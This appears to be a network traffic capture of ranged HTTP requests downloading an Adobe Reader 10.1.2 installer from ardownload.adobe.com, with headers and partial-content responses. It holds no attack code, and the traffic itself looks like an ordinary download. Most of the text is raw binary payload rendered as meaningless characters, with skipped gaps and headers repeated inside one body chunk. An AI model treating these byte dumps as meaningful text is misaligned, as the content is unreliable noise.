Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=3145728-4194303
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:02 GMT
Content-Range: bytes 3145728-4194303/53784984
Content-Length: 1048576
Connection: keep-alive
hfYN.i.G.U*..eK.yn.,~.ym:.H....a. ...B..hcb...U..........G......27..C.kFNZ.. .'.Q.....:<-......*..{/..........WV.I?....i..SI...U6..6.P...q..)!...gDV=D*/...M....mJ{......V...%....UL...Q....[X.1..JI.....6Pm......x...y.>)..(P..q.......D.M..t..Z..@RL=......,....?.9........L.....<^.1.v...3f..g.|...............b%.X..y..m.L....,.....r.]....[.....?....j.!5Y....EMj..8....y.....u.AX5m^..t.N..}..9.O....}...\L.&Z.:J.5..(f@. ..l.x!.jO....=...yz.aE..|...k..AY6.........@X.o?$Eb..n......... ..)..x|b8.."....)....Q.o.......#.-&A..6..@..'s..@.....f......u'(..K..[.&.A.........Z.......W../.%..Fj .e}A6.....>.l.....8Pi..od.....%IC.:Ci.7b..v....h....!x....."...6. ,.ES.5.6g....].k..`.X...$^.L.......M.K......?.....;.*.0.5.B..a......;..=*.\O.M.CQ....$.z..e..c.H....% .G.S...`H?...\t.F.(<..$M..,)$.............%2.[.....^o.1.8`.{w ".. .H.........F..\1..c..f....D.4._.."...u....~O..>m^.ml...`Xg....^.S.r.......`....c .....A.U8i}....MsA..f.:z... >d.{m)....Fe..M.{N.;Q..&..........h.}?...e...&....WI..^......8.....:5.E.l....M.X.@.l....1.....0B.^b....z.]v...e.x..F&<../@..&.c[.....G[..ke.#2..;<.q..:..77..)~.....?........Ye.Z..?.....a...*...bQdG..e...a....lz.6.%jR.k"C....hK`......D-r...h--...R..j..gt........2..ozh/0...k&XWPZ7...._....)o>|.BQB.......q....M.B_.U.>).......S<....iZ.....`J..."..nm..q......./....D...d...<=.\...@!=yeK._?5.U.......5..kS.e....y.P.:.&i....9.Mp. ..8%..|.lM...2.9.... ..)qqC...h..u....3..>7...a...L....2.yU3.c.;..c..j...`(kV......1!Z..%......7....#.Q%.. .n.R.@OWN0$67.1...I....Ew&.....Xpd..8
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=4194304-5242879
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:02 GMT
Content-Range: bytes 4194304-5242879/53784984
Content-Length: 1048576
Connection: keep-alive
.......;...d.A.h..2..H.w.....l..-..k.......I.n..@8.S..*BlZe.....4...'&4N...7....."@.Ib. ..u4.8. .z.....O....w...S...^..-;.<He.Iq.X.ZV....Z.. .u7.6.E..$...s|V...f .t....@. .v..K..^..p&..y....M....h..i.....O.;,_..g....g......R0....p...yD......E|j.#...x....80...>.... .......~...{....A...Pgi..P/~r7.......M.....k..[......6..."#.....3...J.0..... :..q......kMF... . 0.?.zI=....E.....%.a.$..|T.i.........(...<...l........U.>.t...s.?..^..\3.l..].......P... .a...:s.A&....]Jf.CdS$.@q. ....].%[....'k.G ./....d.Q....>...."..p....NJ..n[.,.gG..6.oMU...U..yW.@.V...|..@..'. -......lB...-KU.....;.1....7tI....s.1.......8..M#k..4i.8m.3Y...u..6.[.......i....N.V!..)....s.-.,..(....7..y...h.-.'..o..n....`O..U.k2.r..w0..`.....f.v*..;..l..f.&...K$n........u.f..vp...j.$.hj.4..A..D..q.s...rI.....YA. ....R.>.^Y..y.CH6&.^=.............,.0....H;R..@.N?I.~|p...I..3u..?.aMe.]aU.v...I.[......2...(....O..l.n...y....s_.c.}...eF.*...;... [Cl..!..1........}B.}.8!...g.j........8. .]..`..K.* ..M.q.....?......r...e.G.V'a...3.....<.l.......} .....J.$...h.@..ES...0Uo. ..(....x..*^XZR?A."...R_.D..H...q....2....6....*m.......... ..]...Fr..]...`ê..S...EG.. .GCO......}.......k.mDx.}.....:.k...C.|VMrz.o..[.. ..g;.b...........2.u.....qp...<..{.....x....H.....*....E.. .........p........8`.S`.w|p...z.......-.ta..rt..z_....X....&{.4....A71...!.Y6:.=....8O.@e.Y.....7U...U......a4.....<.g/....Y........3..F.C........xm71.q.U.x.D.`r.?}.:#...:O.N..G....P..T...w..|9...G...I.@O..~-..b.'..aa"...'........rR0...-e.c.j$....=.#..:...../.P&"..$?.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=5242880-6291455
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 5242880-6291455/53784984
Content-Length: 1048576
Connection: keep-alive
..........q0C..}......t..@...@.p..H....H......i.....kG.3..Y.^.fF=...X"....s.xj......=E........I....... ....l.2.3TL..SO.|...$.r72BT...x.C.Y.=._.$...........s..r..!%..6_wwrP(.A.;.h.D.e.2.....q.......T.....^.]..N.......LMwY...Y.L...Y.E......Y6\j.-._^f......(2....f.\1._.V.l7.}.;....Y...&...wj.....~.\..g@s.xI`t.........=..A......o...5....y...;a.:h.....JF..q..x..b..:.E.x..5a'........#.?...1.3.:.x.......i.c..E./0f....m.6...yf.I.........6..).). .5f....[.Ne...U..2.o.i...2......Q....1.Ip;.{..........)K.....<.#.. t>.UR..K.so.m.vUN?YU6]..........8.1.....<...<;`..s.4.@L.. ..HQ^....V........... .Q...eY....q...\K...|.(.]...W.{@.....b]..!8t..J\wG.;._}....)..Sp.bW....2.....{..<nk.U...& .z.=..-.....IZ.I.....L.=.].. ....wG.J....Q.......=.Q....g]Q8.....@...I..n.,.ba....B.d.B..k.......7v.DY..s..R..9c..w C...(=h....p...JV3$...*.`..f..1..@..0..%"<$..._Kk*n..5.n...k....oN4...M3(S..J.......m9U..T".,`a....t#.K.&3&...}.M=....p..0..b...e.[ddo-s.".a.s;........Z....OK..8P..v7qC*.Q1.>b......U$...LDU~m..*....t.....b.....p\..J..,".!.r...;....9j.Y.>.Cu.-V....Rs.F.J..%..2..l...q`I......:Vy.*.z..........X.@n.O.q..X.4<k.{-...B.x....M..l.s`...,.L.....-...l....k....{.;..4.<:r.U.....q.BM.]K.6.R.c,9.l..~.P}Y.lofI...{.....&.....2..|....b.>..4...q...F...2Uq6R..gta.*8.V....^.o.(i.&].n.)..L.#d.xJ...}.o(.......)f.1..Q..._U......7.J...a.._k~;.H.%...yYCeNg.T..2....._..c.i{Q /.5..X......O.V.......... .GGD.....V....n8sm.TBO.7x....{_..d...L...s_d....D...",zdp...U......$#b.M...q.u.........d.bL..g..h7.^.......:G....m..u[.>.*.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=6291456-7340031
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 6291456-7340031/53784984
Content-Length: 1048576
Connection: keep-alive
.R...K.......B......V)kN..KM.<..D.x7h....1.....SWP...%D...d....[.B.Y.....0..x6L.H.....&F._.D.A.e..o.....gf.......`eK.o{d......L...8f..;ae..kNY2....<.........l..M.R.*.q.[....z...Hh..a...6..Q...7kJ..l[.$.`.8..WqA.3)C.c.Su[RBv..@.3....?.a.`.....[.6!.@K.O.......x......T.....?............N..X. ...iT.#........WW.`.S@..ZK|....H..........6..x.....U...y%............9Z.`r#...i.......}@..4.[f ..pN..e...:..U.......X%......_F....y..)...^......m...z.|.z.Q......k......7..{.1;..S... (.r..zh.{W.|..&T.P-..........J.$.t..i.F..._....A( .k.;.<$.u"..m6.Q..d.5E.C......>.4.........x.......w...;...J.g.......}..\I.>h.-OT,..I^...K!=...Z.5.3..................A..P../...1...bV...p...U....gl>..R<tF..s}.................t.xZr...z..l.h.....CyX ?.~...9.....X.F9...=..&.*..........Jp.._?N......k,T;r...k.D..#....f.....T..*..r..v.....".u@...A...........l...Q..Y6<.-.Q=.4.B...2.=/.#.b.........fs..~.o.tlI..i.W@...lv.....n.0...&-...._HmL......6..al...)}q.H.x.....O.?...Y.=.i.[..28.v...]3..r...V..i.km.gK............%........q..I>.1/M...e.._....O.G...^.......~.......B^..U....K.........u.o..O.......[.....fZ.F........f#.."..b....=....=Ts...h8.i.....~=.Y2=....1....T.&.c5RNf.U.F..},cX.mE&.....~..0.,5..`..! Kd....J._g4..1...vo...Bc.."..&..@7H.....4....m.F......U0...#....d..x.B......a.S.. .gcd`h.m....N.kc<?..p..9jJ9x0...,U=...8>...:V..}T.7:...3......I..M....R.p.H..<......{j=%#_...t.v...A/B.(..6l.3.].`........:..d.....x.s...aU...Z.A......l.{.^...P_..`...D...)J.....&...2... .q.)..^.u;...p....qP....["O..'.....,J..O..Z^..P...4b...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=7340032-8388607
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 7340032-8388607/53784984
Content-Length: 1048576
Connection: keep-alive
*.,.o.@.....5DF..q..@.U..@..'.........gH/....?....A>\....yuZ.;N..g....?...LIVMmdu....B...<.o......^b...tQ...~.(l.oS......|Q.[.._N..N..Fu..BTr....).A.X.({..i.....R.h......R.*.....mI..W.;='.<.pEO6..w..m......Ic.......WM..3..`..\5^^..y...}..a...5U:.Uq..T{..q.......*o.d....i....Ob.3.`....<........e."A]u.1.6...F.L...H.....YI..do.D...........Gn.D.....jl........0(.}.*.{.\....i..:...S9$.C&. G.?m......o.q.0..P....$.....o....7G...d.;.<.....Q...0'\...R..........C/.E3..s../.w/............LB.q?.b...|..f....Z...gT...(..s.{.kt6F.mxE A" 8.O..D>o......D...S.i.l...AL.=. i;(M...A.I.w.....7mB....>%........z....OL/J.%Re.]/.k.#.....f....BOqt.oLw...^"..oI..V...7..1.I..^q.W0g....x@.............8.se...F.*...WO.%.55b29c.:l..`QX._<..A.?A.dX.q....@.l$........)..'7.f.Z#.4....*N..l.....*S.........x.0.$s....&j..R.y.....X...;....*.f....Y6.].w..v@*u!....d0...M......{.Ou.2..P.(.;e..5....:....-\...C.uR... v..-[...-..u...{^..*..#/."..C(....%...^..O.......!.x.......o....g).a...N3Ju....rk....}......<.d6.....~,.../.9...9..L.........~NA..J.4Y.j...f...]...._......1...2... l.U.G.R...EmE.&?VW.o.<>.%.fu..XZ...h...(.#,....X1...............{i.....b.......&J.M..bA......H..f.xv..LweZ..0[...Y.....S.....Qh.....JW..<.....Nf4n..nb}Y.n....x.$:J..>=....d.i......B.M"..X.~ZU.}sa.....a..{...t.v".......9..A..:P....1h.&./ .X.P.....^(..H.L.2...z"......%. ..F..LV;.}..C.n.~.j.. sS.._).is...P..i....q..4.4......,.".......6....TYP.o..(pDeiHZ. O...4.!75~.t.......e...Y.....@.....:]d.Q.@..........=.!...*.|.^.Qx.\)..N.........8)l>....X;.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=8388608-9437183
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:04 GMT
Content-Range: bytes 8388608-9437183/53784984
Content-Length: 1048576
Connection: keep-alive
9.........o....u{.y.Wicr.....o....k...u.[.*Y.-~Tp z.....O....PS.I#p{_...1.NF*A..>..W\...s>.?&Z..X..w..w......S!f...g.ZK..e2vi.5.0.o.......p{._P.?...m.. 73v.v."...5R.e..4..GJ80..R"..dKE..v$.....]3E..KsV1.>...C9.;r^.G[..W.b~?#......d.Jd."..j..@...p..9A...%..R8.c O(..h......q..'Ij...../ .n,H....m.Y.l. .R...".p.y.Z..O..x.D....O=.hj.L$...;)9..........W..,h..v^....s2>;0...s.......I.^...._......_........l0.pZ.P.l.........Ge....oA..&.=...../.N...8...V....z...a..:#.!.Y.G.........1.......9J....u8....A..c.65.VG..\..n..|..}>@z....X7`..:.....)..;._.kAw......<6...#..A.$-j...y..........G..U.....7.a-...i:....Nw..Ft.....Ia.O.\../...b,eg.I]..qJ.s.y.\....Sz...................Gd...(.zh.er.2;.]..h...G.d.x.2........7....l:7=..UUm...X.. u."..Q...tp"...Vq..C..........P...2.T...>.C.`..wk.J.qi..tr.,..._'r....U....<B.S.`.ayn=n....Z{....Fv^..$..nX^#$[......>j.k[M......c.. q.....X.....`b.T...$.$...5.N.).U'.T."....c./YH..v.I..:&......A0DrF........7..-...>~4{'.RI!..G.^....C.k.....z...I...yiC_.......>.{....b8...|...........fIIf.`.b.5.I......?......Q..Z....t5!8v.$..n...6..F....\.m.......\'.Y.?..b...H.....$.?J.......R....Df0s.......H."..<.k.....{.Ak..../.qj..&..../.F4y...o..Jl..}.o..|.f....n.]Y.......-....I*p./..O9...G.(L?{...|.....^.;;.C..."...g..$.....L..1R.'2f.jKUF9..........k..&'E.D...QY%p........?.{s.YV.\].K.R'.................L...<....e,UU..k. *.oi...LH .0.a.LQ.;.3............c..O0T...P...S&B.~&gM...R.w...Z....bc.3.T5WV.....{g.$.."..k=.RFU`.T....&...T.a4..,....$.f......GZ.0..d.<9....}<\..;.b...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=9437184-10485759
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:04 GMT
Content-Range: bytes 9437184-10485759/53784984
Content-Length: 1048576
Connection: keep-alive
$9=........d..dZ.A.....$..."h.....e....V..'.~..9...{R.L2;L..}.l.'.$...'..3..5ak.......J........L.:u.....'..5T...h64=........Kd.\.~..[.....7.:..%Y...A...Q.Q......m.....x....!.I.x....$...Y.V..^..U%........h.*... -..y.M../..a...N....Iky.........a1..7i...do3.T..n.{..f?..;..C[]..@$.D=..\..N...E1...n} p../.......VE./.c....9e.J`.b..S.].%....!...}m.Xk.....].z.....w#..v...5.ez6o-gm...5. ......@...."3....E8......6....&.F..dk;ts..x.<.0>.3Y.x...7..`..7......w........(?..`.G.3..l[))R.k?W...g...O\....oo....?p.G.]..;B.0 ....o&....~.G.Ua%t..C........$..{3..G......<2..V....z.5pG...#.3i5......t...@....1..HZO!.,..&@.)...?.8..b...c.......]N......s....v...*.pQ=c!..Zx....V...x..}.T..J...[.........n..=...VO..?;..BO..!`'.c......i(S....W. ..._%...".d._Y.:...w.seU..z....6...qy..W"@l..........(`g$3...}.}C].......x....Mq..n.....c.Sq...[..1I...]E..0...0tn.s.U.&.x.."R)L.h..x0......S.%.i...-k.r.5...._R.....-tH12a...Cs...cC...}=i.Qi..*...$z......L.QI.N.x.......&G2$....T....b.-C./Y..}.wS..e.4.U...1..J......&.(..........X.....e8......e.K.X}q).U....j.,.gqJJ .)|..I5...17...9...;.sW.#T.O..pu.\6....r.l,|......k.-`....d.............S...H.:....._~@n.Mi......M..,N......O.....5u..<...vf......|.....i.D.......1..2 >./u.Z.U...kM..{t.... ....z..j...{.:..e6.5.D;<...h.a....I|;.gW.......^.(..w.O.s ...l2.....A.. .......k.........'K..P}...z.........#f"..5a......f..&V.4[{.Z.39M..T...QLp.rI=..i.x.D......z.j4....]...=T.m....... '.y.tE&k. .|..E.....T......)..R..PU{G....do.Xt..#..[$....-..f.... .HP.....bU5I.>XDML..pD.K.I..q..*E.L..$(!...$Lb.4-O.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=10485760-11534335
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:05 GMT
Content-Range: bytes 10485760-11534335/53784984
Content-Length: 1048576
Connection: keep-alive
.Y[..&....h r....T.!..3$.}.51.z.R....."..G..L...S..M..o.W.59d..E..,5-.d.`.D...h.xK..L.&Y..(...p..$.....)..DHT..7.hqv}&.........$c...^....O..i#..q..,.*.v....)_.....G..Th........y..m....''._7....b%...u..)Z....=.D.T..N..$)A..>..d..{....e....S....{.GF.`..rr.js..Uz..E..\M.....4...E...g..z..`..&q..*...PP..vD";m."U...7..Z..*H..2,_.Ur.L..{BdW.19.%3}.7.].w.a..)...MI.lw.(.%.t.K.."....u.DR..e....m'.W....:6..n..;*#,^{... ....."..lv.t>lC.8.. .Z....M.[.vK0.s...^5.2A.....f..m..:H.K..0K:....l...Of....fo.." ...DE..%.Le.*......|.7.....N..1.."BV.|.M.LIv.z....o..-...]W~6.d.s..|x..pv...:n(..X]$..L.@.D...g....r@......l/..A..2....b..aX.D........nzG.I...;..q...='....OF...>...#.u*_.9.{...4.Hq/.......w..fx.....<.0/&U..#Y..U.3.>f....~......<.c....^...}.....'....Y..G..e.......f...i..k.s.3.Ff...2?....]...$..Co8,...F..p|;.u.....N?...#..J.9.X..<....(.e.R..$.Bd.w../..........$Ff..B.#]..X....?.._M..)..'..N.$.Z&...&.9.n.j...}o...F.8..Bw...b.,.Fqk.....W.4.Y.....u...8......D2....I}.6c3Gx....~..b..t....k..3.;...0..z...<O...7X.....f......c.M&..f..n.......O.W...~Vu....d.F.....={.F.:g!t......"39j...^tS(. .V..am..~h.n.q.F..`..<b..R....3.x8.j.F(...;t!.V....<._f..uS.{.M.:...JQ...c...0..(.V.SsW..>..\..........b:}:..B.........r..\...#....^U....*h/.e..nh<...}}..H.l...........1.2...Br.=.....a./.U.>..:3;.d....83.G...V...p..j....3..\.q....c.2...!.`!Z......M.p%.Q:.....\.tJ.fOj..{...N.g.=....Y......u.......O<....0.<()..0....n.(.....~I..P.&K.|M..w.0.|J....).....`....8hO.u].r...!...A..7.U....._2..!%.._%.....1".m.o...,.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=11534336-12582911
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:05 GMT
Content-Range: bytes 11534336-12582911/53784984
Content-Length: 1048576
Connection: keep-alive
X.:.....[g<.{A...N......[.,.v.[s..PS._.a......^a.C^Z..2..Y....7............._.r...wnQ2...&.v......[i.?..(.Rt...\.0....[.%.lm.........1^..o#....e.3.2......Q.@...3.&D..........F4D.$...W..mb...F.5..Ht.e,.G,....MoP&....g (.}..`.m.~%.u B...Q.....9"tl.......;..";n"..I$).Z.{..5..'RSXW9.g....tj.y.4..!/.Y.l..z..>_X..... .l.>%}VM.....I.Z.0..1cjQ ..s.l...?...H......./bRi......U..l./....._...Fl..^*B .w.U.E... ...H..n'..v..m...\7..Cg1.._MP8...v.........9)...s(_..lm..47........H=6...]9/W.51..)M......-... ...w$..z...[..C.....x.:IJ3.....P.9.a.=G....!.dxl#..8'z...K....o(...y.......}.W..G.. .6.]6&6...?.........~. .x... N..T.|....;"..X!..8..7.G.\...t..a..X(.|........AZS.YE.{....<...E]Vm?.>....e...'...S.......Z....GzZ.F%.m....s....r1...).a.-^.nLE.-\.......[Q.......... p<e.J..>.r .wR...n..V....0.y ....o[...F...|. .\v..D.Ip.Kx.D.....Lc..D S.E..W&../b..`C.[.......m..k? .~...Gt...P.F...RO.C^.....~...."....B...P.]......T..k9_...'R.....z...QA.".Y......n....7.5...2...-@..^1wW..,.9|.I..95f]........v..3..>^.. .$..=.X...........Y.]..}N......j..)M........BQ....P/..D..|;.g.T.E.q....h../....:.....P.w...uj:\.......nT.W..-E. .QTV..(`dH.............g...).SvREc...6.......L..n.......(...^>5..5...R...oD....l.i.#..........h..V0....Q!.W.)i.Xe.....].....N...Z..f..H........\o=...6.(/}...C ...Z..6...).).1..=.[...#..{\.....x*.0.{........1/.&..x.m.mn....dPz4z....jL.R.....7.0....].?.3sI.....z$....6IG.H........0.).I.x.EG.....l.u.7?.d*..).TN!Z}d_...)..b.....*b...6u.a.......:.x..a..eGu..<...'......g.K....G.....l.%..G3.._......|F9
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=12582912-13631487
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:06 GMT
Content-Range: bytes 12582912-13631487/53784984
Content-Length: 1048576
Connection: keep-alive
HTTP/1.1 206 Partial Content..Server: Apache..Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT..ETag: "334b198-4b5a36f1841c0"..Accept-Ranges: bytes..Content-Type: application/octet-stream..Date: Tue, 26 Jul 2016 16:17:06 GMT..Content-Range: bytes 12582912-13631487/53784984..Content-Length: 1048576..Connection: keep-alive..,.(@.s...1.Lk..J..vA..j.p....>....%....z\.. .~..g...n8.Y[.........U..,..u.J.........d.0.W..T(.v...P..q..C..?8..u.....x#tL.A..Q.."....09.....^..Z.n!..)-3.../...../..F%.,..~.>V..:...Z ....O...E....Y..8.[.......C ..WXt.j.k.9...YUZQU.K-.F....h.\...ZD'.@.b..LV.w..>}A\..'.RH`&W.~C...M.;.eG. ..W.#q.cl2z...M.Hb.F...Z.?.......'...........`..N..=........H.p........f.#.&,.|4ng...@..\u....R...........u.....'....>.....ay..0...U.7"Q.........X.........=.*..Rm...I-..e!.]..wxy"..^...t..v..5....4.=.=-.Q&.p..3 .8.....).......Z#... 6.....ix...1.r/. ./....cC.V....G.{....p...;jZJ...]...l.....@@.)./g......y.....b.f......v..>.,........0.|(..,..`..p...........O.f,..bH.1.p..n...m.ID..m....F....y..o...CJ|.E..p..U....5....]..I..d..v...5.f....-...4......<.5.0. w.J.gL';.'-.L.. .}..0Z.I.o.IIu...bw..P...P....T...!.....Ej..8......B-.A..]wl.zV..]..^.C....e^.. ............k"J Piw..^.S.u%7..W.......R....v.....R.4>._&^..q.sA F...'.}.S......t).;.GjX....D..v.../.[...}...5y.-s.....D.gQb....8.z.Z.....=.W...r..o.8....v......No..i>......#..fGZ....:......B...........#....Y...Z*...>,]. ...R[H..K.*...T.-...8..d..R&./..4.C.,.'... .:...T.V|.."..|P*.~p....lS....>...`..4X.hA2V....vw.&).u&.8]vD7.O..#.xMS...)'....Ds.k.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=13631488-14680063
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:06 GMT
Content-Range: bytes 13631488-14680063/53784984
Content-Length: 1048576
Connection: keep-alive
!#\..C.m......."`<M........Fb....1..>.<...#...xo/>...S.C...HA..D....H;..A...n.;....7,......-..B>q .j...;a..y. _\..zF...C&7............A...e..iY...83..6=.....N.m'v.~.r.a.....^O.k.v1...r..5..[.Br.....I..M ..h.*.1.9..H.v..{....WN.#T.u../bUk-...B.`..2^.[Q....5..D.....ZM.W..q..@...."..Tg$,..Y{0.PD].....~...>B........K.QY31W:b...b...W(..;..Y.`....?.qLg.`..$...h....A...4.B..j.Jc...[&..0.|....SpO~...... ...|.m.5f.....v.p..o.T..UZ.....v........>=/.$..cG..XQ..\R.rt=>.....<...d2.q$......f...O.Wh_..F..... .....|.......>.2..8.L....<6.. H.|.... .b..0.e)i..2.....p...HQ...ik=.....].....~..&..K.$.X........yP...8..Q..hW..f_.......0c-....Tiz_A.....5.$..W*.lW.....;.I.D*.nT...*Mj.OZ..|.T ........D.n...".........cv.p..0...Y*..s.........~..t\e .."8 .AW..M`kB.K.3?B._...^~...%...,..>B...O{...2_....=V..ay.4...,.7{..X...}/P.c.......4..^.6..@..F[vmz..L.........v.I.cMz}hk..f...qP..if.z)...12....T..i..V....Lo.e...bHP|.R.^.W.0.............@`5g.P.w.?].y........#._..l..(/J..@..."......_.Xo...MX...4..O.e.:.xV..r.i..DT....B.....I.F.8....u.<-.........z9.'...$..?s>!..Z3?......Vb,Y.) e.....x..2..*..dA\. .P..f.........3aI....b..j....VBc.%...XAir,..;.4.m9....<...|.G...iu.....f..SI...ot.`.Wc..X8Q....=...$>`....CQ.wO.B.%./'P.....*,].Iw...[._zp.a.........6....!.F.V.K.rT.S%O...]...q..s".... ......KQ......K{u).P.P..F..M.H.Y~N.v....$,?a......X... .....z\Q.G.`.........7C.-;..M...i..0.VR..}~.C...k4......Qv.Pt ...\...k.{... ...!N.._....d..$.....7..... HJMf...'_UI.US......p..z<.j.*..v ..Z.....b.....5#.......m.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=14680064-15728639
HTTP/1.1 206 Partial Content
